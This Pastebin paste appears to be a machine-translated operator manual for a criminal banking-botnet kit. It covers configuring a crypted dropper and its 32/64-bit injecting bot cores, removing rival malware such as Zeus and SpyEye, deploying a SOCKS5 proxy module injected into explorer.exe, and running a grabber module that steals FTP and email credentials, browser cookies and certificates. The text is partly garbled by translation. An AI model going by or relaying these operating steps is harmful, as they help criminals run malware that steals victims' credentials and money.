Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Product description:
- itur1, url2, url3 - URLs on the gate dropper ( exe file).
- In addition , there are two main slashes spare in case if your domain loknut .
- This file should be progruzhat . It must be crypted .
- delay - the delay otstuk
- retry - interval core sampling bot.
- buildid - the name dropper botnet .
- encryption_key - encryption key.
- url_server - admin Gate "B" , that is, admin core.
- $ - Notifay .
- ! - A ban .
- @ - Screenshots ( full-size ) .
- macros :
- % BOTID% - ID bot.
- % opensocks% - automatic opening of the socks in the transition to H HRM .
- captcha_server - interception of CAPTCHA . Works with AD. Leave as is.
- After collecting the config files is issued shall be issued 3 - dropper.exe, bot32.dll, bot64.dll and just as you do is file softwaregrabber.dll,
- which has already been assembled independently of the first three .
- dropper.exe - dropper file ( 50 kb ), which pulls the core bot (2 cores , bot32.dll and bot64.dll). This file is crypted .
- bot32.dll - kernel for 32-bit systems .....
- : > kriptovat is not necessary . Avtokript memory . The modules are the basis of the bot and are responsible for the processes of injection and grabbing a browser .
- bot64.dll - kernel for 64 -bit systems .....
- softwaregrabber.dll - module port opening . Responsible for grabbing FTP \ Email \ pop3 \ Billing \ screen and check otstuk kernel modules. Kriptovat is not necessary . Avtokript memory .
- The core of the bot. RULE OF COMMUNICATIONS AND DOWNLOADS . Pay special attention .
- - Adding a file in the " Files" section. As jobs are added files bot32.dll, bot64.dll, softwaregrabber.dll and other modules , including third-party dll or exe files .
- Name and version selected as desired. Bot communicates with the modules Zutick, Shylock, SpyEye, but without an open API ( optional) argument to leave empty.
- Attention ! Communication with the module . First, load the kernel modules . In this case, the kernel modules should not be linked to anything . Next, load the module softwaregrabber.dll,
- that should be associated with bot32.dll
- - Give the job to the modules in the " job ." It should be noted key points :
- a) To select the kernel module loading mode " reusable "
- Module softwaregrabber - " one-off " or " reusable " .
- b) Number of times (performance ) put a big number, eg 9999999 .
- - Quest " written in the config ", " input commands manually " are available only when you open API. Setting the "send logs " is available only for debug version,
- which is done by request and in extreme cases. In this case, the installation logs dropper and obtaining rights go to the " logs " .
- - Net \ dirty - a necessary attribute if you decide to download the bots in one hand.
- - Updating the dll is on the circuit i +1 preserving the bot name in the files and assignments , if necessary update of sequence, and the scheme i, if the update
- comes after the reboot .
- - To update the statistics in the admin dropper , do not forget to add the task to CZK .
- - The difference between the admin area "A" and "B" indicates the quality of your traffic. Cores bot ticking only after obtaining logs . In case
- progruzhaetya kernel , say, Dedic , where there is no activity , the bot will appear in the admin "B" , but did not appear in the admin area "A".
- You can always see the number of loaded cores bot in the " jobs " in the admin dropper . The difference in bad trafe may reach 90 %
- we only show the balance of objective things.
- The module mod-killer is designed to maintain the purity of your bots from third-party bots , unwanted software .
- - Deleting Citadel (all), Zeus (all), SpyEye (all), IceIX (all), Evolution (all) and their derivatives , Carberp ( exception - bootkit )
- Zutick, Lickat, Shylock, Gazavat (Sality).
- - Delete a third-party malicious software, such as loaders , Rata , DDoS bots , based on heuristic analysis.
- - Removal of unwanted software, such as click bots , bots spoofing issue , based on the heuristic analysis.
- - Removal of the common bots even crypted form on the basis of signatures.
- - Total integration with neural network bot. Analysis of unsigned software , processes, without windows, etc.
- Installation Options :
- Specify the arguments (arguments SpyEye in the admin core)
- "77_uninstall;" - the removal of unwanted software , such as a boat- clickers , etc.
- "77_replace_with = http://aa.ru/file.exe" ( if you have the software to progruz , but competitors will ship similar software on your bot ) swings on a new boat with RLS imunnitetom to deliteru - 77_uninstall
- "Report;" - bug report in the admin area of the nucleus.
- "Clean_zeus_based;" - delete all versions of popular signature-based bots .
- The record of a line of several arguments. Each argument must end with "" .
- Load module files , add to the value associated with the core bot32.dll
- In order to use the module socks , do the transaction :
- 1 ) Find a server, it is desirable to Windows ( you can Dedicated Server with installed apache / nginx / xamp / denwer, in general, need a server
- with installed php). Nix on Vine also supposed to work .
- 2) Fill socks_server folder on the server , we put all the 777 law.
- 3) Take gate.php link to the file on the server, remember .
- 4 ) Go to the admin panel dropper , add -ins and socks5Server32.dll socks5Server64.dll, in the arguments indicate the link from paragraph 3 ) .
- Where to inject - explorer.exe.
- 5 ) Sox as IP: Port take in going to the link " your_server " / control.php, either from the log.txt
- Sometimes we clean konnekshn we click in Kill Tasks. The terminal supports the socks fourth and fifth versions of standard rfc.
- Authorization is not required. Volnovatsya about ports for bots do not need , they will take out of the gate .
- WARNING ! The module must be connected to the core bot32.dll for socks5Server32.dll and bot64.dll c socks5Server64.dll respectively.
- Attention ! In the tasks and files names must be exactly socks5Server32.dll and socks5Server64.dll
- Auto open socks carried out on the macro / /% opensocks% in inzhekta .
- The module is designed for grabbing softwaregrabber FTP , email , pop3 data and certificates.
- The module is integrated with a common neural network is bot base module to the kernel .
- Installation Options :
- Specify the arguments (arguments SpyEye in the admin core)
- "Grab_all;" - Rob everything - all FTP data that are recorded by a list of all email-i + contacts uchetka ,
- Cookies IE and FF ( after sending the admin area as possible are removed ) , and certificates MY store ( exported to the admin certificates
- under the password "GCert")
- "Grab_emails;" - grabbing only the email adresses .
- "Grab_ftps;" - grabbing only FTP .
- "Grab_certs;" - grabbing only certificates.
- "Grab_sol;" - salt- grabbing cookies .
- The record of a line of several arguments. Each argument must end with "" .
- Load module files , add to the value associated with the core bot32.dll
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement